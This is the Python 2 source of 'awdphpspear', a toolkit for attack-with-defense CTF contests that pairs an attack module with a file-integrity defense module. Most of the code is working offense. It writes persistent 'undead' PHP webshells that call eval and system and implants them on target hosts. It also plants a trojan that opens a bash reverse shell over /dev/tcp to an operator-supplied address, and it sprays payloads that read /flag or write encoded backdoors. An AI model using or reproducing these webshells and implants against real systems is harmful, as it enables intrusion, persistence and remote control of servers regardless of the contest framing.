# -*- coding:utf-8 -*-
from files import *
from request import *
from shell import *
from upload import *
from attack import *
from protect import *

def config():
	ip_list = []
	print "[+]Attack Config."
	print "[+]Target Address Select."
	ip_num = raw_input('How Num:')
	for i in range(int(ip_num)):
		ip = raw_input('Target:')
		ip_list.append(ip)
	for i in range(len(ip_list)):
		write_txt('target.txt',ip_list[i])
	print "[+]Target Address Select Succeed."
	
def start():
	print "*******************************************************"
	print "****************A*****W**W**W**DDD*********************"
	print "***************A*A****W**W**W**D**D********************"
	print "**************AAAAA****W*W*W***D**D********************"
	print "*************A*****A****W*W****DDD*********************"
	print "**************************************By:ZacharyZcR****"
	print "**************************************Version:*********"
	print "[+]Function list:"
	print "1.Help"
	print "2.Help_CN"
	print "3.Attack_Module"
	print "4.Defense_Module"
	func = raw_input('Num:')
	if func == '1':
		print '''This is an AWD tool platform integrating attack and defense.
With simple configuration, you can start to use various functions.
Function list:
files:
	read_array(target_file)
	read_var(target_file)
	write_txt(target_file,content)
	dir_tree(startpath)
	get_php_list(startpath)
shell:
	shell_gen()
	rce(address,password,method)
upload:
	trojan_implant(address,webshell,trojan,password)
	trojan_implant_memory(address,webshell,password)
	file_implant(address,webshell,name,data,password)
	check(address)
attack:
	confuse(ip = [],php_list = [])'''
	if func == '2':
		print '''这是一个集成了攻击和防御的AWD工具平台。
通过简单的配置你就可以开始使用各项功能了。
功能列表:
files:
	read_array(target_file)
	read_var(target_file)
	write_txt(target_file,content)
	dir_tree(startpath)
	get_php_list(startpath)
shell:
	shell_gen()
	rce(address,password,method)
upload:
	trojan_implant(address,webshell,trojan,password)
	trojan_implant_memory(address,webshell,password)
	file_implant(address,webshell,name,data,password)
	check(address)
attack:
	onfuse(ip = [],php_list = [])'''
	if func == '3':
		print "[+]Attack module loaded"
		print "1.Webshell Generate"
		print "2.Attack Config"
		print "3.Undead Trojan Implant"
		print "4.Memory Trojan Implant(Rebound Shell)"
		print "5.Attack Traffic Confusion"
		_choose = raw_input('Num:')
		if _choose == '1':
			shell_gen()
		if _choose == '2':
			config()
		if _choose == '3':
			webshell = raw_input('Input Target URL Without Host:')
			trojan = raw_input('Input Trojan Name:')
			passwd = raw_input('Input The Webshell Password:')
			target_list = []
			target_list = read_array('target.txt')
			for i in range(len(target_list)):
				trojan_implant(target_list[i],webshell,trojan,passwd)
		if _choose == '4':
			webshell = raw_input('Input Target Webshell URL Without Host:')
			trojan = raw_input('Input Trojan Name:')
			passwd = raw_input('Input The Webshell Password:')
			ip = raw_input('Input Your IP:')
			port = input('Input Your Port:')
			target_list = read_array('target.txt')
			for i in range(len(target_list)):
				trojan_implant_memory(target_list[i],webshell,trojan,ip,port,passwd)
				port += 1
		if _choose == '5':
			target_list = read_array('target.txt')
			file_list = get_php_list('./')
			for i in range(len(target_list)):
				confuse(target_list,file_list)
	if func == '4':
		print "[+]Defense module loaded"
		print "1.Build dir tree."
		print "2.Start file protect module."
		print "3.Start file monitor module."
		print "4.File backup."
		print "5.File backup remove."
		print "6.PHP file add log."
		_choose = raw_input('Num:')
		if _choose == '1':
			dir_tree('./')
		if _choose == '2':
			file_md5_defense()
		if _choose == '3':
			file_md5_check()
		if _choose == '4':
			file_backup()
		if _choose == '5':
			file_backup_remove()
		if _choose == '6':
			file_log_add()


# -*- coding:utf-8 -*-
import os
import hashlib
import time 
import shutil

def get_file_md5(filename):
	m = hashlib.md5()
	with open(filename,'rb') as fobj:
		while True:
			data = fobj.read(4096)
			if not data:
				break
			m.update(data)
	return m.hexdigest()
	
def file_md5_build(startpath):
	global md5_list
	global file_list
	global dir_list
	global root
	md5_list = []
	file_list = []
	dir_list = []
	for root,dirs,files in os.walk(startpath,topdown=True):
		for d in dirs:
			dir_list.append(root+'/'+d)
		for f in files:
			if f[-4:] == '.txt':
				continue
			file_list.append(root+'/'+f)
			md5_list.append(get_file_md5(root+'/'+f))
			
def file_md5_defense():
	file_backup()
	global root
	file_md5_build('./')
	old_list = []
	old_dir_list = []
	new_list = []
	new_dir_list = []
	check_list = []
	old_file_list = []
	new_file_list = []
	check_file_list = []
	old_file_list = file_list[:]
	old_list = md5_list[:]
	old_dir_list = dir_list[:]
	while (1):
		print "*******************************************************"
		print '[+]The old file total:',len(old_list)
		print '[+]The old dir total:',len(old_dir_list)
		print "*******************************************************"
		check_list = old_list[:]
		check_file_list = old_file_list[:]
		file_md5_build('./')
		new_list = md5_list[:]
		new_file_list = file_list[:]
		new_dir_list = dir_list[:]
		sign2 = 0
		
		for i in range(len(old_dir_list)):
			sign3 = 0
			for j in range(len(new_dir_list)):
				if (old_dir_list[i] == new_dir_list[j]):
					sign3 = 1
					break
			if sign3 == 0:
				sign3 = 1
				print old_dir_list[i].replace('./',''),'Disappear!'
				try:
					shutil.copytree(tgt+old_dir_list[i].replace('./','/'),old_dir_list[i])
					print "[+]Repaired."
				except:
					print "[-]No such dir."
		for i in range(len(new_list)):
			sign = 0
			for j in range(len(old_list)):
				if (new_list[i] == old_list[j] and new_file_list[i] == old_file_list[j]):
					check_list[j] = '0'
					sign = 1
					break
			if sign == 0:
				sign2 = 1
				print new_file_list[i].replace('./',''),'Add or Changed!'
				os.remove(new_file_list[i])
				try:
					shutil.copyfile(tgt+new_file_list[i].replace('./','/'),new_file_list[i])
					print "[+]Repaired."
				except:
					print "[-]No such file."
		for i in range(len(check_list)):
			if check_list[i] != '0' and sign2 != 1:
				print check_file_list[i].replace('./',''),'Disappear!'
				sign2 = 0
				try:
					shutil.copyfile(tgt+check_file_list[i].replace('./','/'),check_file_list[i])
					print "[+]Repaired."
				except:
					print "[-]No such file."
				
		print "*******************************************************"
		print '[+]Total file:',len(new_list)
		print '[+]Total dir:',len(new_dir_list)
		print "*******************************************************"
		time.sleep(5)

def file_md5_check():
	file_backup()
	global root
	file_md5_build('./')
	old_list = []
	old_dir_list = []
	new_list = []
	new_dir_list = []
	check_list = []
	old_file_list = []
	new_file_list = []
	check_file_list = []
	old_file_list = file_list[:]
	old_list = md5_list[:]
	old_dir_list = dir_list[:]
	while (1):
		print "*******************************************************"
		print '[+]The old file total:',len(old_list)
		print '[+]The old dir total:',len(old_dir_list)
		print "*******************************************************"
		check_list = old_list[:]
		check_file_list = old_file_list[:]
		file_md5_build('./')
		new_list = md5_list[:]
		new_file_list = file_list[:]
		new_dir_list = dir_list[:]
		sign2 = 0
		
		for i in range(len(old_dir_list)):
			sign3 = 0
			for j in range(len(new_dir_list)):
				if (old_dir_list[i] == new_dir_list[j]):
					sign3 = 1
					break
			if sign3 == 0:
				sign3 = 1
				print old_dir_list[i].replace('./',''),'Disappear!'
		for i in range(len(new_list)):
			sign = 0
			for j in range(len(old_list)):
				if (new_list[i] == old_list[j] and new_file_list[i] == old_file_list[j]):
					check_list[j] = '0'
					sign = 1
					break
			if sign == 0:
				sign2 = 1
				print new_file_list[i].replace('./',''),'Add or Changed!'
		for i in range(len(check_list)):
			if check_list[i] != '0' and sign2 != 1:
				print check_file_list[i].replace('./',''),'Disappear!'
				sign2 = 0
		print "*******************************************************"
		print '[+]Total file:',len(new_list)
		print '[+]Total dir:',len(new_dir_list)
		print "*******************************************************"
		time.sleep(5)

def file_log_add():
	php_list=[]
	for root,dirs,files in os.walk('./',topdown=True):
		for f in files:
			if f[-4:] == '.php':
				php_list.append(root+'/'+f)

	for i in range(len(php_list)):
		php_list[i] = php_list[i].replace('//','/')
		print php_list[i]
	print '[+]Total PHP file:',len(php_list)
	confirm = raw_input("Confirm Open Log Monitoring. 1 or 0:")
	if confirm == '1':
		print "*******************************************************"
		for i in range(len(php_list)):
			level_dir = 0
			for j in range(len(php_list[i])):
				if php_list[i][j] == '/':
					level_dir += 1
			lines = open(php_list[i],"r").readlines()
			length = len(lines)-1
			for j in range(length):
				if '<?php' in lines[j]:
					lines[j]=lines[j].replace('<?php','<?php\nrequire_once("./'+'../'*(level_dir-1)+'log.php");')
			open(php_list[i],'w').writelines(lines)
		print "[+]Log monitoring turned on."

def file_backup():
	src = './'
	try:
		shutil.copytree(src,tgt)
		print "[+]File backup succeed."
	except:
		print "[-]File backup fail.Maybe it exists."
		
def file_backup_remove():
	try:
		shutil.rmtree(tgt)
		print "[+]File backup remove succeed."
	except:
		print "[-]File backup remove fail.Maybe it doesn't exist."

global tgt
tgt = './backup'


import requests
import random

def confuse(ip = [],php_list = []):
	print "*******************************************************"
	payloads = ['system("cat /flag");', 'a=system&b=cat /flag', 'a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};', 'a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};', 'a=assert&b=${fputs(fopen(c.php,w),<?php @eval($_POST[b47a1654c768fa46845e9822c33d5fe9]); ?>1)};', '%73%79%73%74%65%6d%28%22%63%61%74%20%2f%66%6c%61%67%22%29%3b', 'system%28%22cat%20%2fflag%22%29%3b','getflag','"cat /flag;"','echo file_get_contents("/flag");','var_dump(file_get_contents("/flag"));','give_me_flag()']
	for i in range(len(ip)):
		for j in range(len(php_list)):
			payload = payloads[random.randint(0,len(payloads)-1)]
			method = random.randint(1,2)
			if method == 1:
				data = {'cmd':payload}
				try:
					
					r = requests.get(ip[i]+'/'+php_list[j],params=data)
				except:
					print ip[i]+'/'+php_list[j]
					print 'Confuse failed.'
			if method == 2:
				data = {'cmd':payload}
				try:
					print ip[i]+'/'+php_list[j]
					r = requests.post(ip[i]+'/'+php_list[j],data=data)
					print 'Confused.'
				except:
					print 'Confuse failed.'
		print ip[i],'Confused.'
		print "*******************************************************"



import os

def read_array(target_file):
	print "*******************************************************"
	try:
		target_array = []
		line_count = 0
		config_file=open(target_file)
		for line in config_file:
			line=line.strip('\r\n')
			target_array.append(line)
			print (line)
			line_count += 1
		print "[+]Total line:",line_count
		print "[+]File Read Succeed."
		print "*******************************************************"
		return target_array
		config_file.close()
	except:
		print "[-]File Read Failed."
		print "*******************************************************"

def read_var(target_file):
	print "*******************************************************"
	try:
		config_file=open(target_file)
		target_variable = config_file.readline()
		target_variable = target_variable.strip('\r\n')
		print "*",target_variable,"*"
		print "[+]File Read Succeed."
		print "*******************************************************"
		config_file.close()
		return target_variable
	except:
		print "[-]File Read Failed."
		print "*******************************************************"
		
def write_txt(target_file,content):
	print "*******************************************************"
	if content != None:
		try:
			config_file = open(target_file,"a")
			config_file.write(content)
			config_file.write("\r\n")
			config_file.close()
			print "[+]File Write Succeed."
			print "*******************************************************"
		except:
			print "[-]File Write Failed."
			print "*******************************************************"
	else:
		print "[-]Content is None."
		print "*******************************************************"
		
def dir_tree(startpath):
	for root,dirs,files in os.walk(startpath,topdown=True):
		level = root.replace(startpath,'').count(os.sep)
		dir_indent = "|---" * (level-1) + "|---"
		file_indent = "|---" * level + "|---"
		if not level:
			print root.replace(startpath,'')
		else:
			print dir_indent+os.path.basename(root)
		for f in files:
			print file_indent+f
			
def get_php_list(startpath):
	php_list=[]
	for root,dirs,files in os.walk(startpath,topdown=True):
		for f in files:
			if f[-4:] == '.php':
				root = root.replace('./','')
				php_list.append(root+'/'+f)
	for i in range(len(php_list)):
		print php_list[i]
	return php_list


# coding=utf-8

from setuptools import setup, find_packages

setup(
	name='awdphpspear',
	version='0.1.5',
	description=(
		'A tools for AWD attack.'
	),
	author='ZacharyZcR',
	author_email='2903735704@qq.com',
	maintainer='Mystery Security',
	maintainer_email='zacharyzcr@hi-ourlife.com',
	license='MIT License',
	packages=find_packages(),
	platforms=["all"],
	url='https://github.com/ZacharyZcR/AWD',
	install_requires=[
		'requests',
	],
	classifiers=[
		'Development Status :: 4 - Beta',
		'Operating System :: OS Independent',
		'Intended Audience :: Developers',
		'License :: OSI Approved :: BSD License',
		'Programming Language :: Python',
		'Programming Language :: Python :: Implementation',
		'Programming Language :: Python :: 2',
		'Programming Language :: Python :: 2.7',
		'Programming Language :: Python :: 3',
		'Programming Language :: Python :: 3.4',
		'Programming Language :: Python :: 3.5',
		'Programming Language :: Python :: 3.6',
		'Topic :: Software Development :: Libraries'
	],
)


import requests
import os

def shell_gen():
	choose = raw_input('[+]1.Normal Shell.2.Undead Shell.3.Memory Shell.')
	if choose == '1':
		try:
			payload = '<?php'
			payload += '@eval($_POST[a]);@system($_POST[b]);'
			payload += '?>'
			file = open('shell.php',"a")
			file.write(payload)
			file.close()
			print "[+]Succeed."
		except:
			print "[-]Failed."
	if choose == '2':
		try:
			payload = '<?php'
			payload += 'ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file='
			payload += "'"
			payload += trojan
			payload += "'"
			payload += ';$code='
			payload += "'"
			payload += '<?php @eval($_POST[a]);@system($_POST[b]); ?>'
			payload += "'"
			payload += ';while(1){file_put_contents($file,$code);usleep(5000);}'
			payload += '?>'
			file = open('shell.php',"a")
			file.write(payload)
			file.close()
			print "[+]Succeed."
		except:
			print "[-]Failed."
	if choose == '3':
		try:
			payload = '<?php'
			payload += 'ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);'
			payload += ''
			payload += 'while(1){php @eval($_POST[a]);@system($_POST[b]);usleep(5000);}'
			payload += '?>'
			file = open('shell.php',"a")
			file.write(payload)
			file.close()
			print "[+]Succeed."
		except:
			print "[-]Failed."
			
def rce(address,password,method):
	while 1:
		command = raw_input('Command(Input stop to exit):')
		if command == 'stop':
			break
		if method == 'get':
			print "*******************************************************" 
			try:
				data = {password:"system('"+command+"');"}
				r = requests.get(address,params=data)
				if r.text != '':
					print address,":"
					print r.text
					print "*******************************************************" 
			except:
				print "[-]Rce Failed."
				print "*******************************************************" 
		if method == 'post':
			print "*******************************************************" 
			try:
				data = {password:"system('"+command+"');"}
				r = requests.post(address,data=data)
				if r.text != '':
					print address,":"
					print r.text
					print "*******************************************************" 
			except:
				print "[-]Rce Failed."
				print "*******************************************************"



import requests
import os

def trojan_implant(address,webshell,trojan,password):
	payload = ''
	payload += 'ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file='
	payload += "'"
	payload += trojan
	payload += "'"
	payload += ';$code='
	payload += "'"
	payload += '<?php @eval($_POST[a]);@system($_POST[b]); ?>'
	payload += "'"
	payload += ';while(1){file_put_contents($file,$code);usleep(5000);}'
	data = {password:payload}
	try:
		r = requests.get(address+webshell)
		print address+webshell,"[+]Webshell Works Well."
	except:
		print address+webshell,"[-]Webshell Failed"
	try:	
		r = requests.post(address+webshell,data=data,timeout=1)
		if r.status_code == 200:
			r = requests.get(address+trojan)
			if r.status_code == 200:
				print "[+]Implant Succeed."
				print "[+]Trojan Content:",r.text
				print "*******************************************************"
			else:
				print "[-]Implant Failed."
				print "*******************************************************" 
	except:
		r = requests.get(address+trojan)
		if r.status_code == 200:
			print "[+]Implant Succeed."
			print "[-]Trojan Content:",r.text
			print "*******************************************************" 
		else:
			print "[-]Implant Failed."
			print "*******************************************************" 
			
def trojan_implant_memory(address,webshell,trojan,ip,port,password):
	payload = ''
	payload += '$code = "<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);'
	payload += ''
	payload += "while(1){@system('bash -i >& /dev/tcp/"
	payload += ip
	payload += "/"
	payload += port
	payload += ''' 0>&1');};";'''
	payload += '$file = '
	payload += '"'
	payload += trojan
	payload += '";'
	payload += 'file_put_contents($file,$code);'
	data = {password:payload}
	try:
		r = requests.get(address+webshell)
		print address+webshell,"[+]Webshell Works Well."
	except:
		print address+webshell,"[-]Webshell Failed"
	try:	
		r = requests.post(address+webshell,data=data,timeout=1)
		if r.status_code == 200:
			r = requests.get(address+trojan)
			print r.status_code
			if r.status_code == 200:
				print "[+]Implant Succeed."
				print "[+]Trojan Content:",r.text
				print "*******************************************************"
			else:
				print "[-]Implant Failed."
				print "*******************************************************" 
	except:
		r = requests.get(address+trojan)
		if r.status_code == 200:
			print "[+]Implant Succeed."
			print "[+]Trojan Content:",r.text
			print "*******************************************************" 
		else:
			print "[-]Implant Failed."
			print "*******************************************************"
	print 'nc -lvvp '+port+' To Connect.'
	
def file_implant(address,webshell,name,data,password):
	payload = ''
	payload += '$file='
	payload += "'"
	payload += name
	payload += "';"
	payload += '$code='
	payload += "'"
	payload += data
	payload += "';"
	payload += 'file_put_contents($file,$code);'
	file_data = {password:payload}
	try:
		r = requests.get(address+webshell)
		print address,"[+]Webshell Works Well."
	except:
		print address,"[-]Webshell Failed"
	try:	
		r = requests.post(address+webshell,data=file_data,timeout=1)
		if r.status_code == 200:
			r = requests.get(address+name)
			if r.status_code == 200:
				print "[+]Implant Succeed."
				print "[+]Content:",r.text
				print "*******************************************************"
	except:
		r = requests.get(address+name)
		if r.status_code == 200:
			print "[+]Implant Succeed."
			print "[+]Content:",r.text
			print "*******************************************************" 
		else:
			print "[-]Implant Failed."
			print "*******************************************************" 

def check(address):
	try:
		r =requests.get(address)
		if r.status_code == 200 :
			print address,"[+]Living."
			print "*******************************************************" 
			return 1
		else:
			print address,"[-]Dead."
			print "*******************************************************"
			return 0
	except:
		print address,"Dead."
		print "*******************************************************"
		return 0